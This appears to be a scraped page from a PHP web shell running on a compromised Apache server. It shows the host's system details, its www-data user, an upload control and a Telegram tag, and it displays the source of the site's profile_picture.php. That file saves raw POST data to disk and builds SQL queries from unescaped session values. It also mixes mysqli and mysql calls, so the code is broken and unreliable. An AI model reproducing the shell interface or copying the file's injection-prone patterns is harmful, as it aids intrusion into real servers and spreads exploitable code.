( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
$ pwd: /var/www/html/tmpr/../tmpr/../tmpr/../tmpr/../
Upload Files
File: /var/www/html/tmpr/../tmpr/..//tmpr/../tmpr/../profile_picture.php
<?php
include("const.inc.php");
include("protect.php");
include('Connections/videoondemand.php');
require("DbSql.inc.php");
require("NewsSql.inc.php"); 
$db = new NewsSQL($DBName);


session_start(); 
 $catalogid5 = $_SESSION['euserid'];
$me =$_SESSION['euserid'];


if(isset($GLOBALS["HTTP_RAW_POST_DATA"])){
	$jpg = $GLOBALS["HTTP_RAW_POST_DATA"];
	$img = $_GET["img"];
	$folder = "photo/";
	$filename = "OnaTV_".$me. mktime(). ".jpg";
	file_put_contents($folder.$filename, $jpg);
	
	
	  	
 $q=mysqli_query("SELECT * FROM profilepicture WHERE catalogid='$catalogid5'");
			  
	if(mysql_num_rows($q)>0)
	{
	$sql = mysqli_query("update profilepicture set catalogid='$me',picture='$filename',isdisplay='1' where catalogid='$catalogid5'");
	}
	else
	{ 
	
	
mysqli_query("INSERT INTO profilepicture (catalogid,picture) VALUES('$me','$filename') ");
       
	  
	}
		
	
	
} else{
	echo "Encoded JPEG information not received.";
}
?>
@ Telegram